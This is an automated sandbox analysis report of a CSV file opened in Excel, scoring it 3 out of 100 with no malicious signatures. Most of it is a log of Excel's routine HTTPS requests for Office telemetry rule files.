Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PII_PCI_Policy_15205.csv

Overview

General Information

Sample name:PII_PCI_Policy_15205.csv
Analysis ID:1545068
MD5:9dc66bf7b14301c30010a530be347569
SHA1:f20901b3c7313dd839646bfc22e41f61efcb1b60
SHA256:5f0dd57e7305511a7e4aab43cf723691ab849bb9d2301239dc8bd2e556c97700
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7268 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 2120 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49825
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49825, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7268, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
